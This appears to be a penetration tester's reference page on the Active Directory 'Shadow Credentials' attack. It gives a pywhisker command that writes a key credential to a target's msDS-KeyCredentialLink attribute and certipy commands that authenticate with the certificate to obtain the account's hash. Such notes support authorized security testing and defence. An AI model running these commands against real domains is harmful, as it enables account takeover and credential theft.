πΎ Overview
Kerberos pre-authentication is generally done symmetrically, but if PKINIT (certificate-based pre-authentication) is enabled, then a certificate can be used to authenticate to a user or computer account. The msDS-KeyCredentialLink attribute allows a public key to be set for PKINIT.
If you can modify the msDS-KeyCredentialLink attribute for an account, and the domain supports PKINIT for authentication, we can gain access to an account without modifying their credentials.
π Discovery
Requirements:
- PKINIT must be supported for Kerberos pre-authentication
- the ability to edit the targetβs
msDS-KeyCredentialLinkattribute
π Exploitation
You can use pyWhisker to add a new key pair / certificate to the target account.
pywhisker -d [DOMAIN] -u [CONTROLLED USER] -p "[PASSWORD]" --target [TARGET ACCOUNT] --action add⨠Post-Exploitation
You can use certipy to authenticate using the certificate and obtain the hash of the target account.
First, remove the password from the certificate.
certipy cert -export -pfx [CERT].pfx -password [PASSWORD] -out unprotected.pfxNext, authenticate using the certificate to grab the hash.
certipy auth -pfx unprotected.pfx -dc-ip [IP] -username '[TARGET]' -domain '[DOMAIN]'π Resources
| π Hyperlink | βΉοΈ Info |
|---|---|
| SpecterOps | Explaining and introducing ShadowCreds/Whisker |
| Whisker | Tool for manipulating msDS-KeyCredentialLink |
| Certipy | Tool for abusing ADCS |